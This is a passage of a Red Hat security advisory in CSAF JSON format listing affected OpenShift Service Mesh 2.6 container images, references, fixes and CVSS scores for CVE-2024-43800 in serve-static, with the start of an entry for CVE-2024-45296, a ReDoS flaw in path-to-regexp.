"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
